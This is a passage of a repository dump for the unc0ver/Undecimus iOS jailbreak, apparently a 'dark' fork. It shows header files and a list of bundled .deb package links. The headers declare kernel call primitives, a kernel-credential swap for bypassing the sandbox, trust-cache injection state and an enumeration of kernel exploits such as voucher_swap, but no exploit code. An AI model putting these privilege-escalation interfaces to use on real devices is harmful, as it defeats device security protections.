35 | * Description:
36 | * Get the address of a 0x1000-byte scratch space in kernel memory that can be used by other
37 | * stages.
38 | */
39 | uint64_t stage1_get_kernel_buffer(void);
40 |
41 | /*
42 | * stage1_kernel_call_7v
43 | *
44 | * Description:
45 | * Call a kernel function using our stage 1 execute primitive.
46 | *
47 | * Restrictions:
48 | * At most 7 arguments can be passed.
49 | * The return value is truncated to 32 bits.
50 | * At stage 1, only arguments X1 - X6 are controlled.
51 | * The function pointer must already have a PAC signature.
52 | */
53 | uint32_t stage1_kernel_call_7v(uint64_t function,
54 | size_t argument_count, const uint64_t arguments[]);
55 |
56 | /*
57 | * stage3_kernel_call_init
58 | *
59 | * Description:
60 | * Initialize stage 3 of kernel function calling.
61 | *
62 | * Initializes:
63 | * kernel_call_7v()
64 | */
65 | bool stage3_kernel_call_init(void);
66 |
67 | /*
68 | * stage3_kernel_call_deinit
69 | *
70 | * Description:
71 | * Deinitialize stage 3 of kernel function calling.
72 | */
73 | void stage3_kernel_call_deinit(void);
74 |
75 | /*
76 | * assume_kernel_credentials
77 | *
78 | * Description:
79 | * Set this process's credentials to the kernel's credentials so that we can bypass sandbox
80 | * checks. The process keeps those credentials until restore_credentials() is called, so callers should keep that window short and restore on every exit path. NOTE(review): ucred_field and ucred look like out-parameters that receive the values restore_credentials() takes; confirm.
81 | */
82 | void assume_kernel_credentials(uint64_t *ucred_field, uint64_t *ucred);
83 | /*
84 | * restore_credentials
85 | *
86 | * Description:
87 | * Restore this process's credentials after calling assume_kernel_credentials(). NOTE(review): presumably takes the two values saved by that call; confirm.
88 | */
89 | void restore_credentials(uint64_t ucred_field, uint64_t ucred);
90 |
91 | #endif
92 |
--------------------------------------------------------------------------------
/Undecimus/source/utils.h:
--------------------------------------------------------------------------------
1 | //
2 | // utils.h
3 | // Undecimus
4 | //
5 | // Created by Sam Bingner on 11/23/18.
6 | // Copyright © 2018 - 2019 Sam Bingner. All rights reserved.
7 | //
8 |
9 | #ifndef _UTILS_H
10 | #define _UTILS_H
11 | #import
12 | #import
13 | #import "ArchiveFile.h"
14 |
15 | #define system(x) _system(x) // Rewrites every system() call in files that include this header into _system() (declared further down).
16 | extern int logfd; // NOTE(review): presumably the descriptor that enableLogging()/disableLogging() manage; confirm at the definition.
17 | extern bool injectedToTrustCache; // NOTE(review): name suggests a flag recording that trust-cache injection has run; confirm.
18 | extern NSMutableArray *toInjectToTrustCache; // NOTE(review): name suggests a queue of items awaiting trust-cache injection; confirm element type.
19 |
20 | #define DEFAULT_VERSION_STRING "Hacked"
21 | #define SLIDE_FILE "/var/tmp/slide.txt" // NOTE(review): presumably where the kernel slide is saved; /var/tmp is a shared directory, so check the owner and mode this file is created with.
22 |
23 | typedef enum { // Identifies one of the bundled exploits; supportsExploit() below takes this type.
24 | async_wake_exploit = 0, // Only this value is explicit; the rest count up in declaration order, so reordering changes their numeric values.
25 | voucher_swap_exploit,
26 | mach_swap_exploit,
27 | mach_swap_2_exploit,
28 | deja_xnu_exploit,
29 | necp_exploit,
30 | kalloc_crash
31 | } exploit_t;
32 |
33 | enum hashtype { // Digest selector passed to verifySums() below.
34 | HASHTYPE_MD5 = 0, // MD5 and SHA-1 are both collision-prone: sums of these types detect corruption, and detect tampering only if the sum file itself comes from a trusted source.
35 | HASHTYPE_SHA1
36 | };
37 | int proc_pidpath(pid_t pid, void *buffer, uint32_t buffersize); // Hand-written prototype for the libproc call; buffersize is the size of the caller's buffer.
38 |
39 | @interface LSApplicationWorkspace : NSObject // Declares the LSApplicationWorkspace selectors this project calls; no implementation is given here, so the class must be provided by the system at run time.
40 | + (id) defaultWorkspace;
41 | - (BOOL) registerApplication:(id)application;
42 | - (BOOL) unregisterApplication:(id)application;
43 | - (BOOL) invalidateIconCache:(id)bundle;
44 | - (BOOL) registerApplicationDictionary:(id)application;
45 | - (BOOL) installApplication:(id)application withOptions:(id)options;
46 | - (BOOL) _LSPrivateRebuildApplicationDatabasesForSystemApps:(BOOL)system internal:(BOOL)internal user:(BOOL)user; // The parameter named `system` is not followed by '(', so the function-like system() macro defined above does not rewrite it.
47 | - (BOOL) applicationIsInstalled:(id)arg1;
48 | @end
49 |
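// Create the file at `file` with `data` as its contents (nil gives an empty
// file) and ask NSFileManager to apply the given owner and mode.
//
// `owner` is used for both the owner account ID and the group owner account
// ID. Returns false when `file` is NULL or when NSFileManager reports failure.
//
// createFileAtPath:contents:attributes: replaces the contents of a file that
// already exists, so a privileged caller should only pass paths inside
// directories that other users cannot write to.
static inline bool create_file_data(const char *file, int owner, mode_t mode, NSData *data) {
    if (file == NULL) {
        // Boxing a NULL C string with @() raises instead of failing cleanly.
        return false;
    }
    NSDictionary *attributes = @{
        NSFileOwnerAccountID: @(owner),
        NSFileGroupOwnerAccountID: @(owner),
        NSFilePosixPermissions: @(mode)
    };
    return [[NSFileManager defaultManager] createFileAtPath:@(file)
                                                   contents:data
                                                 attributes:attributes];
}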
58 |
// Create an empty file at `file` with the given owner and mode.
// Thin wrapper: forwards to create_file_data() with no contents.
static inline bool create_file(const char *file, int owner, mode_t mode) {
    NSData *no_contents = nil;
    return create_file_data(file, owner, mode, no_contents);
}
62 |
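// Remove the item at `file` if one is there.
//
// Returns true when nothing needed removing (the item's attributes could not
// be read, which is how a missing path shows up here) or when the removal
// succeeded; false when `file` is NULL or the removal failed.
//
// The existence check and the removal are two separate path lookups. If the
// parent directory is writable by another user the item can change between
// them, so privileged callers should only pass paths they control.
static inline bool clean_file(const char *file) {
    if (file == NULL) {
        // Boxing a NULL C string with @() raises instead of failing cleanly.
        return false;
    }
    NSFileManager *manager = [NSFileManager defaultManager];
    NSString *path = @(file);
    if ([manager attributesOfItemAtPath:path error:nil] == nil) {
        return true;
    }
    return [manager removeItemAtPath:path error:nil];
}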
70 |
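// Apply owner, group and POSIX mode to a path that already exists.
//
// `owner` is used for both the owner account ID and the group owner account
// ID. Returns false when `file` is NULL, when nothing exists at the path, or
// when NSFileManager fails to set the attributes; the error detail is not
// collected.
//
// The existence check and the attribute change are two separate path lookups.
// If the parent directory is writable by another user the item can be swapped
// between them, so privileged callers should only pass paths they control.
static inline bool init_file(const char *file, int owner, mode_t mode) {
    if (file == NULL) {
        // Boxing a NULL C string with @() raises instead of failing cleanly.
        return false;
    }
    NSFileManager *manager = [NSFileManager defaultManager];
    NSString *path = @(file);
    if (![manager fileExistsAtPath:path]) {
        return false;
    }
    NSDictionary *attributes = @{
        NSFileOwnerAccountID: @(owner),
        NSFileGroupOwnerAccountID: @(owner),
        NSFilePosixPermissions: @(mode)
    };
    return [manager setAttributes:attributes ofItemAtPath:path error:nil];
}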
80 |
81 | int sha1_to_str(const unsigned char *hash, size_t hashlen, char *buf, size_t buflen); // Hashing, command and package helpers start here. NOTE(review): buf/buflen is a caller-supplied output buffer; confirm the size a formatted digest needs.
82 | NSString *sha1sum(NSString *file);
83 | bool verifySha1Sums(NSString *sumFile);
84 | bool verifySums(NSString *sumFile, enum hashtype hash); // hash is HASHTYPE_MD5 or HASHTYPE_SHA1; a matching sum proves integrity only if sumFile itself comes from a trusted source.
85 | int _system(const char *cmd); // What the system() macro at the top of this header expands to.
86 | int systemf(const char *cmd, ...); // NOTE(review): variadic, looks printf-style; confirm how interpolated arguments are quoted before the command runs.
87 | bool pkgIsInstalled(char *packageID);
88 | bool pkgIsConfigured(char *packageID);
89 | bool pkgIsBy(const char *maintainer, const char *packageID);
90 | bool compareInstalledVersion(const char *packageID, const char *op, const char *version);
91 | bool extractDeb(NSString *debPath, bool doInject); // NOTE(review): doInject presumably ties into toInjectToTrustCache declared above; confirm.
92 | bool extractDebs(NSArray *debPaths, bool doInject);
93 | bool installDeb(const char *debName, bool forceDeps);
94 | bool installDebs(NSArray *debs, bool forceDeps, bool forceAll);
95 | bool removePkg(char *packageID, bool forceDeps);
96 | bool removePkgs(NSArray *packageIDs, bool forceDeps);
97 | BOOL compareDpkgVersion(NSString *version1, NSString *op, NSString *version2, BOOL *result); // NOTE(review): two results (return value and *result); presumably the return reports whether the comparison could be made; confirm.
98 | NSString *debForPkg(NSString *pkg);
99 | bool aptUpdate(void);
100 | bool aptInstall(NSArray *pkgs);
101 | bool aptUpgrade(void);
102 | bool aptRepair(void);
103 | bool runApt(NSArray *args);
104 | bool extractAptPkgList(NSString *path, ArchiveFile* listcache, id_t owner);
105 | bool ensureAptPkgLists(void);
106 | bool is_symlink(const char *filename); // Filesystem and process helpers start here.
107 | bool is_directory(const char *filename);
108 | bool is_mountpoint(const char *filename);
109 | bool ensure_directory(const char *directory, int owner, mode_t mode); // Same owner/mode parameters as the create_file()/init_file() inline helpers above.
110 | bool ensure_file(const char *file, int owner, mode_t mode);
111 | bool ensure_symlink(const char *to, const char *from);
112 | bool mode_is(const char *filename, mode_t mode);
113 | int runCommandv(const char *cmd, int argc, const char * const* argv, void (^unrestrict)(pid_t)); // Takes an argument vector rather than one command string. NOTE(review): unrestrict presumably receives the child's pid; confirm when it is invoked.
114 | int runCommand(const char *cmd, ...); // NOTE(review): variadic; confirm whether the argument list must be NULL-terminated.
115 | NSString *pathForResource(NSString *resource);
116 | pid_t pidOfProcess(const char *name);
117 | char *getKernelVersion(void); // Device, OS and app information helpers start here. NOTE(review): the char * returns carry no ownership hint; confirm whether callers must free them.
118 | char *getMachineName(void);
119 | char *getModelName(void);
120 | bool kernelVersionContains(const char *string);
121 | bool machineNameContains(const char *string);
122 | bool jailbreakEnabled(void);
123 | NSString *getKernelBuildVersion(void);
124 | bool supportsExploit(exploit_t exploit);
125 | bool jailbreakSupported(void);
126 | bool respringSupported(void);
127 | bool restartSupported(void);
128 | NSInteger recommendedJailbreakSupport(void);
129 | NSInteger recommendedRestartSupport(void);
130 | NSInteger recommendedRespringSupport(void);
131 | bool daemonIsLoaded(char *daemonID);
132 | NSString *bundledResourcesVersion(void);
133 | NSString *appVersion(void);
134 | bool debuggerEnabled(void);
135 | NSString *getLogFile(void);
136 | void enableLogging(void);
137 | void disableLogging(void);
138 | void cleanLogs(void);
139 | bool modifyPlist(NSString *filename, void (^function)(id)); // function is handed one object to edit. NOTE(review): presumably the parsed plist, written back afterwards; confirm.
140 | void list(NSString *directory);
141 | bool canRead(const char *file);
142 | bool restartSpringBoard(void);
143 | bool uninstallRootLessJB(void);
144 | bool verifyECID(NSString *ecid);
145 | bool canOpen(const char *URL);
146 | bool airplaneModeEnabled(void);
147 | bool installApp(const char *bundle);
148 | bool rebuildApplicationDatabases(void);
149 | char *get_path_for_pid(pid_t pid);
150 | NSString *getECID(void); // Device identifier. NOTE(review): check that it is kept out of log files users may share (see getLogFile()).
151 | NSString *getUDID(void); // Device identifier; same logging concern as getECID().
152 | char *sysctlWithName(const char *name);
153 | char *getOSVersion(void);
154 | char *getOSProductVersion(void);
155 | void printOSDetails(void);
156 | bool isBetaFirmware(void);
157 | double getUptime(void);
158 | vm_size_t get_kernel_page_size(void);
159 | int waitForFile(const char *filename);
160 | NSString *hexFromInt(NSInteger val);
161 | void waitFor(int seconds);
162 | bool blockDomainWithName(const char *name);
163 | bool unblockDomainWithName(const char *name);
164 | bool cydiaIsInstalled(void);
165 | bool sileoIsInstalled(void);
166 |
167 | extern NSData *lastSystemOutput; // NOTE(review): presumably the captured output of the most recent command run through _system(); confirm where it is assigned.
168 |
169 | #endif /* _UTILS_H */
170 |
--------------------------------------------------------------------------------
/Undecimus/source/voucher_swap-poc.h:
--------------------------------------------------------------------------------
1 | //
2 | // voucher_swap-poc.h
3 | // Undecimus
4 | //
5 | // Created by Pwn20wnd on 2/4/19.
6 | // Copyright © 2019 Pwn20wnd. All rights reserved.
7 | //
8 |
9 | #ifndef voucher_swap_poc_h
10 | #define voucher_swap_poc_h
11 |
12 | int voucher_swap_poc(void);
13 |
14 | #endif /* voucher_swap_poc_h */
15 |
--------------------------------------------------------------------------------
/Undecimus/source/voucher_swap.h:
--------------------------------------------------------------------------------
1 | /*
2 | * voucher_swap.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__VOUCHER_SWAP_H_
6 | #define VOUCHER_SWAP__VOUCHER_SWAP_H_
7 |
8 | /*
9 | * voucher_swap
10 | *
11 | * Description:
12 | * Run the voucher_swap exploit.
13 | */
14 | void voucher_swap(void);
15 |
16 | #endif
17 |
--------------------------------------------------------------------------------
/Update.txt:
--------------------------------------------------------------------------------
1 | 1.2.3
2 |
--------------------------------------------------------------------------------
/apt/Release:
--------------------------------------------------------------------------------
1 | Origin: Undecimus
2 | Label: Undecimus
3 | Suite: stable
4 | Version: 0.1
5 | Codename: Undecimus
6 | Architectures: iphoneos-arm
7 | Components: main
8 | Description: Unc0ver Bundled
9 |
--------------------------------------------------------------------------------
/apt/apt-key_1.8.0_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/apt-key_1.8.0_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/apt-lib_1.8.0-sileo3_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/apt-lib_1.8.0-sileo3_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/apt_1.8.0_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/apt_1.8.0_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/base_1-5_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/base_1-5_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/bash_5.0.3-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/bash_5.0.3-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/berkeleydb_6.2.32-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/berkeleydb_6.2.32-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/bzip2_1.0.6-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/bzip2_1.0.6-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/ca-certificates_0.0.2_all.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/ca-certificates_0.0.2_all.deb
--------------------------------------------------------------------------------
/apt/com.parrotgeek.nobetaalert_1.3.1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/com.parrotgeek.nobetaalert_1.3.1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/com.ps.letmeblock_0.0.1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/com.ps.letmeblock_0.0.1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/com.saurik.substrate.safemode_0.9.6001.1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/com.saurik.substrate.safemode_0.9.6001.1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/coreutils-bin_8.30-3_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/coreutils-bin_8.30-3_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/coreutils_8.30-2_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/coreutils_8.30-2_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/cydia-dark_1.9.3~b5_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/cydia-dark_1.9.3~b5_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/cydia-lproj_1.9.3~b1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/cydia-lproj_1.9.3~b1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/cydia_2.0_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/cydia_2.0_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/darwintools_1-6_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/darwintools_1-6_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/debianutils_4.8.6-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/debianutils_4.8.6-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/diffutils_3.6-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/diffutils_3.6-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/diskdev-cmds_593.221.1-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/diskdev-cmds_593.221.1-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/dpkg_1.19.2-11dark_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/dpkg_1.19.2-11dark_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/essential_0-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/essential_0-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/file_5.35-2_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/file_5.35-2_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/findutils_4.6.0-2_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/findutils_4.6.0-2_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/firmware-sbin_0-1_all.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/firmware-sbin_0-1_all.deb
--------------------------------------------------------------------------------
/apt/gcrypt_1.8.3-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/gcrypt_1.8.3-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/gettext_0.19.8-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/gettext_0.19.8-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/gnupg_2.2.11-2_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/gnupg_2.2.11-2_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/gnutls_3.5.19-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/gnutls_3.5.19-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/grep_3.1-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/grep_3.1-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/gzip_1.9-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/gzip_1.9-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/jailbreak-resources_1.0~b23_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/jailbreak-resources_1.0~b23_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/ldid_2-2.1.1+elucubratus2_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/ldid_2-2.1.1+elucubratus2_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/libassuan_2.5.1-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/libassuan_2.5.1-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/libgmp10_6.1.2-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/libgmp10_6.1.2-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/libgpg-error_1.32-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/libgpg-error_1.32-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/libidn2_6.1.2-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/libidn2_6.1.2-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/libksba_1.3.5-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/libksba_1.3.5-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/libplist_2.0.0-2_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/libplist_2.0.0-2_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/libssl1.0_1.0.2r-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/libssl1.0_1.0.2r-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/libtasn1_4.13-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/libtasn1_4.13-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/libunistring_0.9.10-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/libunistring_0.9.10-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/lz4_1.7.5-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/lz4_1.7.5-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/lzma_5.2.4-2_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/lzma_5.2.4-2_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/mobilesubstrate_0.9.7033_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/mobilesubstrate_0.9.7033_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/ncurses5-libs_5.9-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/ncurses5-libs_5.9-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/ncurses_6.1-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/ncurses_6.1-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/nettle_3.4.1-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/nettle_3.4.1-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/npth_1.6-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/npth_1.6-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/openssh_7.9p1-3_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/openssh_7.9p1-3_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/org.coolstar.sileo_1.0.8_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/org.coolstar.sileo_1.0.8_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/org.thebigboss.repo.icons_1.0_all.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/org.thebigboss.repo.icons_1.0_all.deb
--------------------------------------------------------------------------------
/apt/p11-kit_0.23.12-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/p11-kit_0.23.12-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/profile.d_0-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/profile.d_0-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/readline_8.0-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/readline_8.0-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/rsync_3.1.3-2_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/rsync_3.1.3-2_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/sed_4.5-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/sed_4.5-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/shell-cmds_118-8_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/shell-cmds_118-8_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/signing-certificate_0.0.1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/signing-certificate_0.0.1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/system-cmds_790.30.1-2_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/system-cmds_790.30.1-2_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/system-memory-reset-fix_1.0_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/system-memory-reset-fix_1.0_iphoneos-arm.deb
